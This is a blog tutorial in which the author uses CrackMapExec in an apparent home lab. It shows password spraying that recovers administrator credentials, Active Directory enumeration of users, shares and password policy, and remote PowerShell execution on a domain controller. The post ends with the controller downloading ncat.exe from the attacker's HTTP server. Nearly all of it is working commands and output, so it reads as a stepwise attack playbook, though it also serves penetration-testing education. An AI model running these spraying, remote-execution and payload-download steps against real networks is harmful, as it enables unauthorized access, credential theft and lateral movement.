Thursday, May 2, 2019

Having Fun with CrackMapExec

In this post, we will be learning a bit about the tool CrackMapExec. This tool is not installed by default on Kali and thus we need to install it.

root@securitynik:# apt-get instal crackmapexec


Now that it is installed, we can start by looking at the help.
root@securitynik:/cme# crackmapexec --help 
usage: crackmapexec [-h] [-v] [-t THREADS] [-id CRED_ID [CRED_ID ...]]
                    [-u USERNAME [USERNAME ...]] [-d DOMAIN | --local-auth]
                    [-p PASSWORD [PASSWORD ...] | -H HASH [HASH ...]]
                    [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L]
                    [--show-options] [--share SHARE] [--smb-port {139,445}]
                    [--mssql-port PORT] [--server {http,https}]
                    [--server-host HOST] [--server-port PORT]
                    [--timeout TIMEOUT]
                    [--gfail-limit LIMIT | --ufail-limit LIMIT | --fail-limit LIMIT]
                    [--verbose] [--sam] [--lsa] [--ntds {vss,drsuapi}]
                    [--ntds-history] [--ntds-pwdLastSet]
                    [--wdigest {enable,disable}] [--shares] [--uac]
                    [--sessions] [--disks] [--users] [--rid-brute [MAX_RID]]
                    [--pass-pol] [--lusers] [--wmi QUERY]
                    [--wmi-namespace NAMESPACE] [--spider [FOLDER]]
                    [--content] [--exclude-dirs DIR_LIST]
                    [--pattern PATTERN [PATTERN ...] | --regex REGEX
                    [REGEX ...]] [--depth DEPTH]
                    [--exec-method {smbexec,wmiexec,atexec}] [--force-ps32]
                    [--no-output] [-x COMMAND | -X PS_COMMAND] [--mssql]
                    [--mssql-query QUERY] [--mssql-auth {windows,normal}]
                    [target [target ...]]

.... <truncated for brevity> ....

Now that we have the help. Let's see what we can learn about the remote hosts within our subnet. Without any credentials, we are able to see ...

root@securitynik:/cme# crackmapexec 10.0.0.100/24
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
[*] KTHXBYE!

From above, we see that without any credentials, we were able to identify 3 hosts on the 10.0.0.0/24 subnet. Let's now add those hosts to a file which we can use in the future.


root@securitynik:/cme# echo 10.0.0.103 >> cme-hosts.txt
root@securitynik:/cme# echo 10.0.0.3 >> cme-hosts.txt
root@securitynik:/cme# echo 10.0.0.105 >> cme-hosts.txt
root@securitynik:/cme# crackmapexec cme-hosts.txt 
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
[*] KTHXBYE!


Now that we have a file consisting of the hosts, let's see what else we can figure out. First let's try to enumerate the shares:


root@securitynik:/# crackmapexec cme-hosts.txt --shares
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
[*] KTHXBYE!

The above does not look any different from what we had previously. Lets see what happens if we add some usernames and passwords to a file.

Let's add the usernames to the text file first.

root@securitynik:/cme# echo administrator >> username.txt
root@securitynik:/cme# echo nakia >> username.txt
root@securitynik:/cme# echo neysa >> username.txt
root@securitynik:/cme# echo securitynik >> username.txt
root@securitynik:/cme# echo saadia >> username.txt


Now let's add the passwords to a file.

root@securitynik:/cme# echo password >> password.txt
root@securitynik:/cme# echo password >> password.txt
root@securitynik:/cme# echo GuessMe >> password.txt 
root@securitynik:/cme# echo Testing1 >> password.txt 

Let's try a password spraying attack to see if one of these passwords in the "passwords.txt" file work for one or more of the username in the "username.txt" file. At the sametime, let's enumerate the shares on any host we are able to successfully authenticate against.

root@securitynik:/cme#crackmapexec cme-hosts.txt -u username.txt -p password.txt --shares
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\neysa:Testing1 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating shares
CME          10.0.0.103:445 SECURITYNIK-WIN SHARE           Permissions
CME          10.0.0.103:445 SECURITYNIK-WIN -----           -----------
CME          10.0.0.103:445 SECURITYNIK-WIN ShareFolder     READ, WRITE
CME          10.0.0.103:445 SECURITYNIK-WIN ADMIN$          READ, WRITE
CME          10.0.0.103:445 SECURITYNIK-WIN IPC$            READ
CME          10.0.0.103:445 SECURITYNIK-WIN C$              READ, WRITE
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating shares
CME          10.0.0.105:445 SECNIK-2K19     SHARE           Permissions
CME          10.0.0.105:445 SECNIK-2K19     -----           -----------
CME          10.0.0.105:445 SECNIK-2K19     NETLOGON        READ
CME          10.0.0.105:445 SECNIK-2K19     SYSVOL          READ
CME          10.0.0.105:445 SECNIK-2K19     ADMIN$          NO ACCESS
CME          10.0.0.105:445 SECNIK-2K19     IPC$            READ
CME          10.0.0.105:445 SECNIK-2K19     C$              NO ACCESS
[*] KTHXBYE!


From above we see the different passwords were tried and ultimately, we were successful using password "Testing1" with username "administrator" on host "SECURITYNIK-WIN". From the "(Pwn3d!)" above, we can say this system is owned. Think admin privileges.

At the same time, we see we were also able to determine the credentials for "neysa" as "Testing1" on the host "SECNIK-2k19".

Now that we know we have credentials that work, let's focus on using "administrator" and "Testing1" for the rest of our activities

Let's continue enumerating the hosts.

Let's first start with testing to determine whether or not User Access Control (UAC) is enabled.


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --uac
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating UAC status
CME          10.0.0.105:445 SECNIK-2K19     1 - UAC Enabled
.... <error occurred here> ...
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating UAC status
CME          10.0.0.103:445 SECURITYNIK-WIN 1 - UAC Enabled
[*] KTHXBYE!


From above, we see UAC is enabled on hosts "10.0.0.105:445 SECNIK-2K19" and "10.0.0.103:445 SECURITYNIK-WIN".

Let's continue enumerating. This time let's enumerate the disks on the hosts.


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --disks
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating disks
CME          10.0.0.103:445 SECURITYNIK-WIN C:
CME          10.0.0.103:445 SECURITYNIK-WIN D:
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating disks
CME          10.0.0.105:445 SECNIK-2K19     C:
CME          10.0.0.105:445 SECNIK-2K19     D:
[*] KTHXBYE!

From above, we see that both "10.0.0.103:445 SECURITYNIK-WIN" and "10.0.0.105:445 SECNIK-2K19" are reporting that they have both a "C:" and a "D:" drive.

We are also able to enumerate existing sessions on the hosts as shown below:


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --sessions
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating active sessions
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating active sessions
[*] KTHXBYE!

Let's now enumerate the users on the systems:


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --users
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Dumping users
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/LogonCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/LogonCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/LogonCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/LogonCount: 7
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/LogonCount: 83
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping users
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/LogonCount: 33
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/PrimaryGroupId: 514
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/FullName: nakia
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/FullName: neysa
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/FullName: securitynik
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/FullName: saadia
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/FullName: nik
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/LogonCount: 0

From above, we can conclude that the device at "10.0.0.105:445 SECNIK-2K19" is more than likely an Active Directory domain controller. Now that we know what this device is, let's enumerate the domain policy:


root@securitynik:/cme#crackmapexec 10.0.0.105 --pass-pol -u administrator -p Testing1
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping password policy
CME          10.0.0.105:445 SECNIK-2K19     Minimum password length: 7
CME          10.0.0.105:445 SECNIK-2K19     Password history length: 24
CME          10.0.0.105:445 SECNIK-2K19     Maximum password age: 41 days 23 hours 52 minutes
CME          10.0.0.105:445 SECNIK-2K19     Minimum password age: 23 hours 52 minutes
CME          10.0.0.105:445 SECNIK-2K19     Account lockout threshold: 0
CME          10.0.0.105:445 SECNIK-2K19     Account lockout duration: None
[*] KTHXBYE!

From above, an attacker now has tremendous visibility into the users in the domain as well information on the password policy to mount an effective password based attack. Realistically, we already have the administrator credentials. However, the information above is still helpful.

Let's do our final enumeration to list the currently logged on users to the host at "10.0.0.105:445 SECNIK-2K19 " which is reporting as a domain controller.


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lusers
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating logged on users
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\Administrator LogonServer: SECNIK-2K19
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 

From above we can conclude username "Administrator" is currently logged on. The account "SECNIK-2K19$" represent the computer account account. Note the "$" at the end.

Now that we have enumerated the various information from the hosts, let's now stick with the domain controller.

Let's run  a Powershell command to get the list of processes running on the host.


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X get-process
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command 
CME          10.0.0.105:445 SECNIK-2K19     #< CLIXML
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
CME          10.0.0.105:445 SECNIK-2K19     -------  ------    -----      -----     ------     --  -- -----------
CME          10.0.0.105:445 SECNIK-2K19     84       6     2824        992       0.17    840   1 cmd
CME          10.0.0.105:445 SECNIK-2K19     76       5     3280       3708       0.02   4696   0 cmd
CME          10.0.0.105:445 SECNIK-2K19     251      13     8036       1212       3.34   4088   1 conhost
CME          10.0.0.105:445 SECNIK-2K19     147       9     7112      12512       0.05   4912   0 conhost
CME          10.0.0.105:445 SECNIK-2K19     330      13     2172       5572       0.66    352   0 csrss
CME          10.0.0.105:445 SECNIK-2K19     304      15     2204       5192       0.61    424   1 csrss
CME          10.0.0.105:445 SECNIK-2K19     395      15     5472      17024       0.78   3024   1 ctfmon
CME          10.0.0.105:445 SECNIK-2K19     381      32    16200      21988       5.03   1996   0 dfsrs
CME          10.0.0.105:445 SECNIK-2K19     191      13     2584       7700       0.03   1160   0 dfssvc
CME          10.0.0.105:445 SECNIK-2K19     215      16     3288      11392       0.06   2416   1 dllhost
CME          10.0.0.105:445 SECNIK-2K19     10366    7411   129432     128224       2.23   3472   0 dns
CME          10.0.0.105:445 SECNIK-2K19     647      48    67024     123304      30.19    856   1 dwm
CME          10.0.0.105:445 SECNIK-2K19     1805      78    63140      11888      21.97   3000   1 explorer
....
CME          10.0.0.105:445 SECNIK-2K19     54       4      728       3156       0.03   1676   0 wlms
CME          10.0.0.105:445 SECNIK-2K19     369      20    11468      22504       0.70    168   0 WmiPrvSE
CME          10.0.0.105:445 SECNIK-2K19     351      13     6056      13148       0.67   4304   0 WmiPrvSE
CME          10.0.0.105:445 SECNIK-2K19     174      11     2872       9004       0.05   4520   0 WmiPrvSE
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>

Very nice that we can use this tool to execute powershell commands from our Kali host. Hmmm. I wonder what else we can do. Let's see if we can get the host to download a malicious binary. Let's load Python's SimpleHTTPServer on port 443. Before we do that though, let's understand the directory structure of the host by executing:


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\\"  --exec-method smbexec
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command via smbexec
CME          10.0.0.105:445 SECNIK-2K19     Volume in drive C has no label.
CME          10.0.0.105:445 SECNIK-2K19     Volume Serial Number is DA96-0589
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     Directory of c:\
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     09/15/2018  12:19 AM    <DIR>          PerfLogs
CME          10.0.0.105:445 SECNIK-2K19     03/14/2019  12:37 PM    <DIR>          Program Files
CME          10.0.0.105:445 SECNIK-2K19     09/15/2018  02:08 AM    <DIR>          Program Files (x86)
CME          10.0.0.105:445 SECNIK-2K19     03/19/2019  03:41 PM    <DIR>          Tools
CME          10.0.0.105:445 SECNIK-2K19     03/03/2019  11:19 PM    <DIR>          Users
CME          10.0.0.105:445 SECNIK-2K19     03/13/2019  07:55 PM    <DIR>          Windows
CME          10.0.0.105:445 SECNIK-2K19     0 File(s)              0 bytes
CME          10.0.0.105:445 SECNIK-2K19     6 Dir(s)  31,761,924,096 bytes free
[*] KTHXBYE!


Let's now see if we can download the "ncat.exe" and place it in the "Tools" folder. First we setup our web server using Python's SimpleHTTPServer on port 443.


root@securitynik:/usr/share/ncat-w32# ls
ncat.exe  README
root@securitynik:/usr/share/ncat-w32# file ncat.exe 
ncat.exe: PE32 executable (console) Intel 80386, for MS Windows
root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...

Once again, we will leverage powershell. This time to get the host to download the "ncat.exe" from our attacking machine.


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X "(New-Object System.Net.WebClient).DownloadFile('http://10.0.0.100:443/ncat.exe','c:\tools\ncat.exe')"
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command 
CME          10.0.0.105:445 SECNIK-2K19     #< CLIXML
CME          10.0.0.105:445 SECNIK-2K19     <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>


To verify "ncat.exe" has been download successfully, let's browse the tools directory:

root@securitynik:/# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\tools\ncat.exe" --exec-method smbexec
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command via smbexec
CME          10.0.0.105:445 SECNIK-2K19     Volume in drive C has no label.
CME          10.0.0.105:445 SECNIK-2K19     Volume Serial Number is DA96-0589
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     Directory of c:\tools
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     04/03/2019  07:29 PM         1,667,584 ncat.exe
